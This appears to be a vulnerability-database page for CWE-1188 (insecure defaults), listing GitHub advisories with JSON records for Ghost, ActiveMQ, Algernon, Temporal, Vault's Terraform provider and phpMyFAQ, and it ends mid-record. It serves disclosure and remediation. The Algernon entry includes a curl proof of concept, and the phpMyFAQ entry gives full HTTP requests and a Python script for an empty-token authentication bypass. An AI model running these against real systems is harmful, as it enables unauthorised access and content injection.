Common Weakness Enumeration

CWE-1188

Allowed

Initialization of a Resource with an Insecure Default

Abstraction: Base · Status: Incomplete

The product initializes or sets a resource with a default that is intended to be changed by the product's installer, administrator, or maintainer, but the default is not secure.

402 vulnerabilities reference this CWE, most recent first.

GHSA-GFR8-QFH4-R5RC

Vulnerability from github – Published: 2023-01-19 18:30 – Updated: 2025-11-04 21:30
VLAI
Details

An insecure default vulnerability exists in the Post Creation functionality of Ghost Foundation Ghost 5.9.4. Default installations of Ghost allow non-administrator users to inject arbitrary Javascript in posts, which allow privilege escalation to administrator via XSS. To trigger this vulnerability, an attacker can send an HTTP request to inject Javascript in a post to trick an administrator into visiting the post.A stored XSS vulnerability exists in the twitter field for a user.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2022-47194"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1188",
      "CWE-453",
      "CWE-79"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-01-19T18:15:00Z",
    "severity": "MODERATE"
  },
  "details": "An insecure default vulnerability exists in the Post Creation functionality of Ghost Foundation Ghost 5.9.4. Default installations of Ghost allow non-administrator users to inject arbitrary Javascript in posts, which allow privilege escalation to administrator via XSS. To trigger this vulnerability, an attacker can send an HTTP request to inject Javascript in a post to trick an administrator into visiting the post.A stored XSS vulnerability exists in the `twitter` field for a user.",
  "id": "GHSA-gfr8-qfh4-r5rc",
  "modified": "2025-11-04T21:30:28Z",
  "published": "2023-01-19T18:30:21Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-47194"
    },
    {
      "type": "WEB",
      "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2022-1686"
    },
    {
      "type": "WEB",
      "url": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1686"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-GG75-8696-PM3P

Vulnerability from github – Published: 2022-05-13 01:52 – Updated: 2022-05-13 01:52
VLAI
Details

dcc_curr_list is initialized with a default invalid value that is expected to be programmed by the user through a sysfs node which could lead to an invalid access in all Android releases from CAF (Android for MSM, Firefox OS for MSM, QRD Android) using the Linux Kernel.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2018-5841"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1188"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2018-06-06T21:29:00Z",
    "severity": "HIGH"
  },
  "details": "dcc_curr_list is initialized with a default invalid value that is expected to be programmed by the user through a sysfs node which could lead to an invalid access in all Android releases from CAF (Android for MSM, Firefox OS for MSM, QRD Android) using the Linux Kernel.",
  "id": "GHSA-gg75-8696-pm3p",
  "modified": "2022-05-13T01:52:56Z",
  "published": "2022-05-13T01:52:56Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-5841"
    },
    {
      "type": "WEB",
      "url": "https://source.android.com/security/bulletin/2018-05-01"
    },
    {
      "type": "WEB",
      "url": "https://www.codeaurora.org/security-bulletin/2018/05/11/may-2018-code-aurora-security-bulletin-2"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-GG9R-WR4P-W63H

Vulnerability from github – Published: 2026-06-11 09:31 – Updated: 2026-06-11 09:31
VLAI
Details

Wss4jSecurityInterceptor initialized its BSP (WS-I Basic Security Profile) compliance flag so that inbound validation disabled WSS4J BSP enforcement on RequestData. Services that validate WS-Security on the network could therefore accept messages that violate BSP rules, weakening protocol-level checks.

Affected versions: Spring Web Services 5.0.0 through 5.0.1; 4.1.0 through 4.1.3; 4.0.0 through 4.0.18; 3.1.0 through 3.1.8.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-40994"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1188"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-06-11T07:16:27Z",
    "severity": "HIGH"
  },
  "details": "Wss4jSecurityInterceptor initialized its BSP (WS-I Basic Security Profile) compliance flag so that inbound validation disabled WSS4J BSP enforcement on RequestData. Services that validate WS-Security on the network could therefore accept messages that violate BSP rules, weakening protocol-level checks.\n\nAffected versions:\nSpring Web Services 5.0.0 through 5.0.1; 4.1.0 through 4.1.3; 4.0.0 through 4.0.18; 3.1.0 through 3.1.8.",
  "id": "GHSA-gg9r-wr4p-w63h",
  "modified": "2026-06-11T09:31:56Z",
  "published": "2026-06-11T09:31:56Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40994"
    },
    {
      "type": "WEB",
      "url": "https://spring.io/security/cve-2026-40994"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-GJ3F-49GC-9P6W

Vulnerability from github – Published: 2023-04-18 00:32 – Updated: 2024-04-04 03:31
VLAI
Details

An Insecure Default Initialization of Resource vulnerability in Juniper Networks Junos OS Evolved allows an unauthenticated, network based attacker to read certain confidential information. In the default configuration it is possible to read confidential information about locally configured (administrative) users of the affected system. This issue affects Juniper Networks Junos OS Evolved: All versions prior to 20.4R3-S7-EVO on pending commit???; 21.1-EVO versions prior to 21.1R3-S4-EVO on awaiting build; 21.4-EVO versions prior to 21.4R3-S1-EVO; 22.2-EVO versions prior to 22.2R3-EVO; 21.2-EVO versions prior to 21.2R3-S5-EVO on pending commit???; 21.3-EVO version 21.3R1-EVO and later versions; 22.1-EVO version 22.1R1-EVO and later versions; 22.2-EVO versions prior to 22.2R2-S1-EVO.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-28978"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1188"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-04-17T22:15:09Z",
    "severity": "MODERATE"
  },
  "details": "An Insecure Default Initialization of Resource vulnerability in Juniper Networks Junos OS Evolved allows an unauthenticated, network based attacker to read certain confidential information. In the default configuration it is possible to read confidential information about locally configured (administrative) users of the affected system. This issue affects Juniper Networks Junos OS Evolved: All versions prior to 20.4R3-S7-EVO on pending commit???; 21.1-EVO versions prior to 21.1R3-S4-EVO on awaiting build; 21.4-EVO versions prior to 21.4R3-S1-EVO; 22.2-EVO versions prior to 22.2R3-EVO; 21.2-EVO versions prior to 21.2R3-S5-EVO on pending commit???; 21.3-EVO version 21.3R1-EVO and later versions; 22.1-EVO version 22.1R1-EVO and later versions; 22.2-EVO versions prior to 22.2R2-S1-EVO.",
  "id": "GHSA-gj3f-49gc-9p6w",
  "modified": "2024-04-04T03:31:37Z",
  "published": "2023-04-18T00:32:01Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-28978"
    },
    {
      "type": "WEB",
      "url": "https://supportportal.juniper.net/JSA70603"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-GJ5M-M88J-V7C3

Vulnerability from github – Published: 2024-05-02 09:30 – Updated: 2025-02-11 19:03
VLAI
Summary
Apache ActiveMQ's default configuration doesn't secure the API web context
Details

In Apache ActiveMQ 6.x, the default configuration doesn't secure the API web context (where the Jolokia JMX REST API and the Message REST API are located). It means that anyone can use these layers without any required authentication. Potentially, anyone can interact with the broker (using Jolokia JMX REST API) and/or produce/consume messages or purge/delete destinations (using the Message REST API).

To mitigate, users can update the default conf/jetty.xml configuration file to add authentication requirement:    

Or we encourage users to upgrade to Apache ActiveMQ 6.1.2 where the default configuration has been updated with authentication by default.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Maven",
        "name": "org.apache.activemq:apache-activemq"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "6.0.0"
            },
            {
              "fixed": "6.1.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-32114"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1188"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-05-03T17:47:07Z",
    "nvd_published_at": "2024-05-02T09:15:06Z",
    "severity": "HIGH"
  },
  "details": "In Apache ActiveMQ 6.x, the default configuration doesn\u0027t secure the API web context (where the Jolokia JMX REST API and the Message REST API are located). It means that anyone can use these layers without any required authentication. Potentially, anyone can interact with the broker (using Jolokia JMX REST API) and/or produce/consume messages or purge/delete destinations (using the Message REST API).\n\nTo mitigate, users can update the default conf/jetty.xml configuration file to add authentication requirement:\n\u003cbean id=\"securityConstraintMapping\" class=\"org.eclipse.jetty.security.ConstraintMapping\"\u003e\n\u00a0 \u003cproperty name=\"constraint\" ref=\"securityConstraint\" /\u003e\n\u00a0 \u003cproperty name=\"pathSpec\" value=\"/\" /\u003e\n\u003c/bean\u003e\n\nOr we encourage users to upgrade to Apache ActiveMQ 6.1.2 where the default configuration has been updated with authentication by default.",
  "id": "GHSA-gj5m-m88j-v7c3",
  "modified": "2025-02-11T19:03:08Z",
  "published": "2024-05-02T09:30:48Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-32114"
    },
    {
      "type": "WEB",
      "url": "https://github.com/apache/activemq/pull/1201"
    },
    {
      "type": "WEB",
      "url": "https://github.com/apache/activemq/commit/43cc596219b6a8c8b5a54fbda3fb68cb4424f2d0"
    },
    {
      "type": "WEB",
      "url": "https://activemq.apache.org/security-advisories.data/CVE-2024-32114-announcement.txt"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/apache/activemq"
    },
    {
      "type": "WEB",
      "url": "https://issues.apache.org/jira/browse/AMQ-9477"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Apache ActiveMQ\u0027s default configuration doesn\u0027t secure the API web context"
}

GHSA-GJ84-924C-48FX

Vulnerability from github – Published: 2026-05-20 15:33 – Updated: 2026-05-20 15:33
VLAI
Summary
Algernon: Auto-refresh SSE event server binds to all interfaces by default on Linux/macOS
Details

Summary

The SSE event server bound to 0.0.0.0:5553 on Linux/macOS by default because the platform-dependent host default in engine/flags.go:39-46 set host = "" for non-Windows, and utils.JoinHostPort("", ":5553") resolves to ":5553" — a Go http.Server.Addr of ":5553" listens on every interface. On Windows the same code chose "localhost", binding loopback only.

The result was a platform split where the OS Algernon's dev workflow is most often used on (Linux/macOS) got the network-exposed default, and only Windows users got the loopback-safe one. A LAN peer with no developer interaction could connect to <dev-laptop-ip>:5553 and read the file-change stream.

This advisory covers the bind-address default in isolation. The fix is independent of authentication (#2a) and CORS (#2b) — switching the default to loopback can be done without touching either.

Details

Root cause — platform-dependent host default in handleFlags

// engine/flags.go:39-46  (1.17.6)
host := ""
if runtime.GOOS == "windows" {
    host = "localhost"
    // Default Bolt database file
    ac.defaultBoltFilename = filepath.Join(serverTempDir, "algernon.db")
    // Default log file
    ac.defaultLogFile = filepath.Join(serverTempDir, "algernon.log")
}
// engine/config.go:388-391  (1.17.6, finalConfiguration)
if ac.eventAddr == "" {
    ac.eventAddr = utils.JoinHostPort(host, ac.defaultEventColonPort)
}

Result tabulated:

Platform host eventAddr after JoinHostPort Effective bind
Linux "" ":5553" 0.0.0.0:5553 (all interfaces)
macOS "" ":5553" 0.0.0.0:5553 (all interfaces)
Windows "localhost" "localhost:5553" 127.0.0.1:5553 (loopback)

The same host value also governs the main web server bind, so the platform split affects both ports. The web-server bind on Linux/macOS is a separate (defensible) design decision — a server intended to be reachable; the SSE port is not such a service and inherited the same default by accident.

Why this is an independent finding

The fix is a single line: change the default host value, or change the eventAddr default specifically, to "localhost" regardless of platform. No change to authentication or CORS is required to close the network-reach half of the original bundled advisory. A LAN peer can no longer connect — the listener is unreachable from another host — even if the SSE handler still has no authentication and still returns Allow-Origin: *.

PoC (against 1.17.6 on Linux/macOS)

# Operator's laptop on a hotel/cafe/office WiFi:
algernon -a /path/to/project
# => SSE listener bound to 0.0.0.0:5553

# Any peer on the same subnet:
$ curl -sN http://<dev-laptop-ip>:5553/sse
id: 0
data: /path/to/project/secret-notes.md

id: 1
data: /path/to/project/.env.local

No interaction from the developer is required. The peer needs network reach and nothing else.

Impact

  • Confidentiality: medium. LAN-bounded continuous information disclosure of filenames and edit timing.
  • Integrity: none.
  • Availability: none directly.

The CVSS vector uses AV:A (adjacent network) to model the LAN-only reach. The vector for a misconfigured deployment behind a NAT-less or routed network would shift to AV:N and rise to 5.3.

Suggestions to fix

Primary fix — pick localhost as the SSE default on every platform.

// engine/flags.go -- platform-independent default for the event listener
// (keep the existing platform split for the WEB server if desired, but
// not for the event server)
host := "localhost"

Or, more surgically:

// engine/config.go -- finalConfiguration
if ac.eventAddr == "" {
    ac.eventAddr = utils.JoinHostPort("localhost", ac.defaultEventColonPort)
}

An operator who genuinely wants LAN-reachable SSE can pass --eventserver 0.0.0.0:5553 explicitly and accept the consequences.

Stronger fix — eliminate the second listener entirely. Mount the SSE handler on the main mux at /sse. The bind address is then whatever the main server uses; there is no second listener and therefore no second bind-address default to get wrong.

Live verification

Audit-host bind check (Windows 10):

$ netstat -an | findstr 5553
  TCP    127.0.0.1:5553         0.0.0.0:0              LISTENING

Confirms the Windows default is localhost. The Linux/macOS bind to 0.0.0.0:5553 is documented in the code path above; it was not exercised on the audit machine because the audit host was Windows. A maintainer reproducing on a Linux host would see 0.0.0.0:5553 LISTENING from ss -tlnp.

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 1.17.6"
      },
      "package": {
        "ecosystem": "Go",
        "name": "github.com/xyproto/algernon"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.17.7"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-46430"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1188",
      "CWE-668"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-20T15:33:56Z",
    "nvd_published_at": null,
    "severity": "MODERATE"
  },
  "details": "### Summary\n\nThe SSE event server bound to `0.0.0.0:5553` on Linux/macOS by default because the platform-dependent host default in `engine/flags.go:39-46` set `host = \"\"` for non-Windows, and `utils.JoinHostPort(\"\", \":5553\")` resolves to `\":5553\"` \u2014 a Go `http.Server.Addr` of `\":5553\"` listens on every interface. On Windows the same code chose `\"localhost\"`, binding loopback only.\n\nThe result was a platform split where the OS Algernon\u0027s dev workflow is most often used on (Linux/macOS) got the network-exposed default, and only Windows users got the loopback-safe one. A LAN peer with no developer interaction could connect to `\u003cdev-laptop-ip\u003e:5553` and read the file-change stream.\n\nThis advisory covers the bind-address default in isolation. The fix is independent of authentication (#2a) and CORS (#2b) \u2014 switching the default to loopback can be done without touching either.\n\n### Details\n\n#### Root cause \u2014 platform-dependent `host` default in `handleFlags`\n\n```go\n// engine/flags.go:39-46  (1.17.6)\nhost := \"\"\nif runtime.GOOS == \"windows\" {\n    host = \"localhost\"\n    // Default Bolt database file\n    ac.defaultBoltFilename = filepath.Join(serverTempDir, \"algernon.db\")\n    // Default log file\n    ac.defaultLogFile = filepath.Join(serverTempDir, \"algernon.log\")\n}\n```\n\n```go\n// engine/config.go:388-391  (1.17.6, finalConfiguration)\nif ac.eventAddr == \"\" {\n    ac.eventAddr = utils.JoinHostPort(host, ac.defaultEventColonPort)\n}\n```\n\nResult tabulated:\n\n| Platform | `host` | `eventAddr` after `JoinHostPort` | Effective bind |\n|---|---|---|---|\n| Linux | `\"\"` | `\":5553\"` | `0.0.0.0:5553` (all interfaces) |\n| macOS | `\"\"` | `\":5553\"` | `0.0.0.0:5553` (all interfaces) |\n| Windows | `\"localhost\"` | `\"localhost:5553\"` | `127.0.0.1:5553` (loopback) |\n\nThe same `host` value also governs the main web server bind, so the platform split affects both ports. The web-server bind on Linux/macOS is a separate (defensible) design decision \u2014 a server intended to be reachable; the SSE port is *not* such a service and inherited the same default by accident.\n\n#### Why this is an independent finding\n\nThe fix is a single line: change the default `host` value, or change the `eventAddr` default specifically, to `\"localhost\"` regardless of platform. No change to authentication or CORS is required to close the network-reach half of the original bundled advisory. A LAN peer can no longer connect \u2014 the listener is unreachable from another host \u2014 even if the SSE handler still has no authentication and still returns `Allow-Origin: *`.\n\n### PoC (against 1.17.6 on Linux/macOS)\n\n```bash\n# Operator\u0027s laptop on a hotel/cafe/office WiFi:\nalgernon -a /path/to/project\n# =\u003e SSE listener bound to 0.0.0.0:5553\n\n# Any peer on the same subnet:\n$ curl -sN http://\u003cdev-laptop-ip\u003e:5553/sse\nid: 0\ndata: /path/to/project/secret-notes.md\n\nid: 1\ndata: /path/to/project/.env.local\n```\n\nNo interaction from the developer is required. The peer needs network reach and nothing else.\n\n### Impact\n\n- **Confidentiality:** medium. LAN-bounded continuous information disclosure of filenames and edit timing.\n- **Integrity:** none.\n- **Availability:** none directly.\n\nThe CVSS vector uses `AV:A` (adjacent network) to model the LAN-only reach. The vector for a misconfigured deployment behind a NAT-less or routed network would shift to `AV:N` and rise to 5.3.\n\n### Suggestions to fix\n\n**Primary fix \u2014 pick `localhost` as the SSE default on every platform.**\n\n```go\n// engine/flags.go -- platform-independent default for the event listener\n// (keep the existing platform split for the WEB server if desired, but\n// not for the event server)\nhost := \"localhost\"\n```\n\nOr, more surgically:\n\n```go\n// engine/config.go -- finalConfiguration\nif ac.eventAddr == \"\" {\n    ac.eventAddr = utils.JoinHostPort(\"localhost\", ac.defaultEventColonPort)\n}\n```\n\nAn operator who genuinely wants LAN-reachable SSE can pass `--eventserver 0.0.0.0:5553` explicitly and accept the consequences.\n\n**Stronger fix \u2014 eliminate the second listener entirely.** Mount the SSE handler on the main mux at `/sse`. The bind address is then whatever the main server uses; there is no second listener and therefore no second bind-address default to get wrong.\n\n### Live verification\n\nAudit-host bind check (Windows 10):\n\n```\n$ netstat -an | findstr 5553\n  TCP    127.0.0.1:5553         0.0.0.0:0              LISTENING\n```\n\nConfirms the Windows default is `localhost`. The Linux/macOS bind to `0.0.0.0:5553` is documented in the code path above; it was not exercised on the audit machine because the audit host was Windows. A maintainer reproducing on a Linux host would see `0.0.0.0:5553 LISTENING` from `ss -tlnp`.",
  "id": "GHSA-gj84-924c-48fx",
  "modified": "2026-05-20T15:33:56Z",
  "published": "2026-05-20T15:33:56Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/xyproto/algernon/security/advisories/GHSA-gj84-924c-48fx"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/xyproto/algernon"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Algernon: Auto-refresh SSE event server binds to all interfaces by default on Linux/macOS"
}

GHSA-GM2G-2XR9-PXXJ

Vulnerability from github – Published: 2023-06-30 18:31 – Updated: 2023-07-10 10:36
VLAI
Summary
Temporal Server vulnerable to Incorrect Authorization and Insecure Default Initialization of Resource
Details

Insecure defaults in open-source Temporal Server before version 1.20 on all platforms allows an attacker to craft a task token with access to a namespace other than the one specified in the request. Creation of this task token must be done outside of the normal Temporal server flow. It requires the namespace UUID and information from the workflow history for the target namespace. Under these conditions, it is possible to interfere with pending tasks in other namespaces, such as marking a task failed or completed. If a task is targeted for completion by the attacker, the targeted namespace must also be using the same data converter configuration as the initial, valid, namespace for the task completion payload to be decoded by workers in the target namespace.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "go.temporal.io/server"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.20.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2023-3485"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1188",
      "CWE-863"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2023-06-30T20:25:35Z",
    "nvd_published_at": "2023-06-30T18:15:10Z",
    "severity": "LOW"
  },
  "details": "Insecure defaults in open-source Temporal Server before version 1.20 on all platforms allows an attacker to craft a task token with access to a namespace other than the one specified in the request. Creation of this task token must be done outside of the normal Temporal server flow. It requires the namespace UUID and information from the workflow history for the target namespace. Under these conditions, it is possible to interfere with pending tasks in other namespaces, such as marking a task failed or completed.\nIf a task is targeted for completion by the attacker, the targeted namespace must also be using the same data converter configuration as the initial, valid, namespace for the task completion payload to be decoded by workers in the target namespace.",
  "id": "GHSA-gm2g-2xr9-pxxj",
  "modified": "2023-07-10T10:36:45Z",
  "published": "2023-06-30T18:31:02Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-3485"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/temporalio/temporal"
    },
    {
      "type": "WEB",
      "url": "https://github.com/temporalio/temporal/releases/tag/v1.20.0"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:N/I:L/A:L",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Temporal Server vulnerable to Incorrect Authorization and Insecure Default Initialization of Resource"
}

GHSA-GMM6-J2G5-R52M

Vulnerability from github – Published: 2025-11-21 15:31 – Updated: 2025-11-27 08:37
VLAI
Summary
Vault’s Terraform Provider incorrectly set default deny_null_bind parameter for LDAP auth method to false by default
Details

Vault’s Terraform Provider incorrectly set the default deny_null_bind parameter for the LDAP auth method to false by default, potentially resulting in an insecure configuration. If the underlying LDAP server allowed anonymous or unauthenticated binds, this could result in authentication bypass. This vulnerability, CVE-2025-13357, is fixed in Vault Terraform Provider v5.5.0.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/hashicorp/terraform-provider-vault"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "5.5.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-13357"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1188"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-11-21T18:10:41Z",
    "nvd_published_at": "2025-11-21T15:15:51Z",
    "severity": "HIGH"
  },
  "details": "Vault\u2019s Terraform Provider incorrectly set the default deny_null_bind parameter for the LDAP auth method to false by default, potentially resulting in an insecure configuration. If the underlying LDAP server allowed anonymous or unauthenticated binds, this could result in authentication bypass. This vulnerability, CVE-2025-13357, is fixed in Vault Terraform Provider v5.5.0.",
  "id": "GHSA-gmm6-j2g5-r52m",
  "modified": "2025-11-27T08:37:51Z",
  "published": "2025-11-21T15:31:28Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-13357"
    },
    {
      "type": "WEB",
      "url": "https://github.com/hashicorp/terraform-provider-vault/pull/2622"
    },
    {
      "type": "WEB",
      "url": "https://github.com/hashicorp/terraform-provider-vault/commit/882bc7f409acc99c872c345edd65159d9568589a"
    },
    {
      "type": "WEB",
      "url": "https://discuss.hashicorp.com/t/hcsec-2025-33-vault-terraform-provider-applied-incorrect-defaults-for-ldap-auth-method/76822"
    },
    {
      "type": "ADVISORY",
      "url": "https://github.com/advisories/GHSA-gmm6-j2g5-r52m"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/hashicorp/terraform-provider-vault"
    },
    {
      "type": "WEB",
      "url": "https://github.com/hashicorp/terraform-provider-vault/releases/tag/v5.5.0"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Vault\u2019s Terraform Provider incorrectly set default deny_null_bind parameter for LDAP auth method to false by default"
}

GHSA-GP95-J463-VV28

Vulnerability from github – Published: 2026-05-20 15:46 – Updated: 2026-06-09 00:05
VLAI
Summary
phpMyFAQ: Default Empty API Token Authentication Bypass
Details

Summary

A default empty API client token allows any unauthenticated user to create and modify FAQ entries, categories, and questions via the REST API. The vulnerability exists in all versions since API v4.0 was introduced because the installation process seeds api.apiClientToken with an empty string, and the hasValidToken() comparison logic cannot distinguish between "no token configured" and "attacker sent a matching empty token header."

Details

The root cause is in two files:

1. Installation default (src/phpMyFAQ/Setup/Installation/DefaultDataSeeder.php, line 277-278):

'api.enableAccess'   => 'true',
'api.apiClientToken' => '',       // ← defaults to empty string

2. Authentication check (src/phpMyFAQ/Controller/AbstractController.php, line 198-204):

protected function hasValidToken(): void
{
    $request = Request::createFromGlobals();
    if ($this->configuration->get('api.apiClientToken') !== $request->headers->get('x-pmf-token')) {
        throw new UnauthorizedHttpException('"x-pmf-token" is not valid.');
    }
}

The method uses strict inequality (!==). When api.apiClientToken is '' (default) and the attacker sends x-pmf-token: (empty header value), the comparison becomes '' !== '' which evaluates to false — no exception is thrown, and authentication is completely bypassed.

The OpenAPI annotations confirm the developer intended these endpoints to require authentication: write endpoints are tagged 'Endpoints with Authentication' and document HTTP 401 responses, while read-only endpoints are tagged 'Public Endpoints'.

The following API endpoints call $this->hasValidToken() as their only authentication check:

File Endpoint Method
src/.../Controller/Api/FaqController.php:701-703 /api/v4.0/faq/create POST
src/.../Controller/Api/FaqController.php:857-859 /api/v4.0/faq/update PUT
src/.../Controller/Api/CategoryController.php:278-280 /api/v4.0/category POST
src/.../Controller/Api/QuestionController.php:89-91 /api/v4.0/question POST

PoC

Environment: phpMyFAQ 4.2.0-alpha, PHP 8.4.16, SQLite, installed with all defaults.

Step 1 — Verify that requests without auth header are correctly rejected:

POST /api/v4.0/faq/create HTTP/1.1
Host: <target>
Content-Type: application/json

{
    "language": "en",
    "category-id": 1,
    "question": "Test Question",
    "answer": "Test Answer",
    "keywords": "test",
    "author": "test",
    "email": "test@test.com",
    "is-active": true,
    "is-sticky": false
}

Response (HTTP 401 — correctly blocked):

{"type":".../problems/unauthorized","title":"Unauthorized","status":401,"detail":"Unauthorized access.","instance":"/v4.0/faq/create"}

Step 2 — Send the same request with an empty x-pmf-token header:

POST /api/v4.0/faq/create HTTP/1.1
Host: <target>
Content-Type: application/json
x-pmf-token: 

{
    "language": "en",
    "category-id": 1,
    "question": "[POC] Authentication Bypass Confirmed",
    "answer": "This FAQ was created without any valid authentication token.",
    "keywords": "poc,bypass",
    "author": "Security Researcher",
    "email": "researcher@example.com",
    "is-active": true,
    "is-sticky": false
}

Response (HTTP 201 — bypass confirmed):

{"stored": true}

Step 3 — Category creation via the same bypass:

POST /api/v4.0/category HTTP/1.1
Host: <target>
Content-Type: application/json
x-pmf-token: 

{
    "language": "en",
    "parent-id": 0,
    "category-name": "POC_Category",
    "description": "Category created via empty token bypass",
    "user-id": 1,
    "group-id": -1,
    "is-active": true,
    "show-on-homepage": true
}

Response (HTTP 201):

{"stored": true}

Step 4 — Verify injected content is publicly visible:

GET /api/v4.0/faqs/1 HTTP/1.1
Host: <target>

Response (HTTP 200 — injected FAQ publicly exposed):

[{"record_id":1,"record_lang":"en","category_id":1,"record_title":"[POC] Authentication Bypass Confirmed","record_preview":"This FAQ was created without any valid authentication token. ..."}]

PoC with Python (urllib — no external dependencies):

import urllib.request, json

TARGET = "http://<target>"
HEADERS = {"Content-Type": "application/json", "x-pmf-token": ""}

# Create FAQ via empty token bypass
data = json.dumps({
    "language": "en", "category-id": 1,
    "question": "[POC] Auth Bypass", "answer": "Created via bypass.",
    "keywords": "poc", "author": "R", "email": "r@t.com",
    "is-active": True, "is-sticky": False
}).encode()
req = urllib.request.Request(f"{TARGET}/api/v4.0/faq/create", data=data, headers=HEADERS, method="POST")
resp = urllib.request.urlopen(req)
print(f"Status: {resp.status}")  # 201 — bypass successful

Overlap Summary:

Test x-pmf-token HTTP Status Result
No auth header (not sent) 401 Unauthorized 🔒 Correctly blocked
Empty token header "" 201 Created 🔓 Bypass confirmed
Category creation "" 201 Created 🔓 Bypass confirmed
Public verification (not needed) 200 OK 📄 Injected content visible

Impact

This is an authentication bypass (CWE-1188) affecting any phpMyFAQ installation where the administrator has not explicitly set a non-empty API client token — which is the default state after installation.

  • Who is impacted? Any organization running phpMyFAQ with default configuration. The REST API is enabled by default, and the token defaults to empty. No action by the administrator is required for the vulnerability to exist — it is the out-of-the-box state.
  • What can an attacker do? Create and modify FAQ entries, categories, and questions without any authentication. This enables content injection for phishing, SEO spam, reputation damage, and distribution of malicious links through the knowledge base.
  • What is NOT affected? Read-only API endpoints are intentionally public. Session-authenticated admin endpoints are not affected. File upload and backup endpoints require separate session-based authentication.
Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 4.1.2"
      },
      "package": {
        "ecosystem": "Packagist",
        "name": "thorsten/phpmyfaq"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "4.1.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
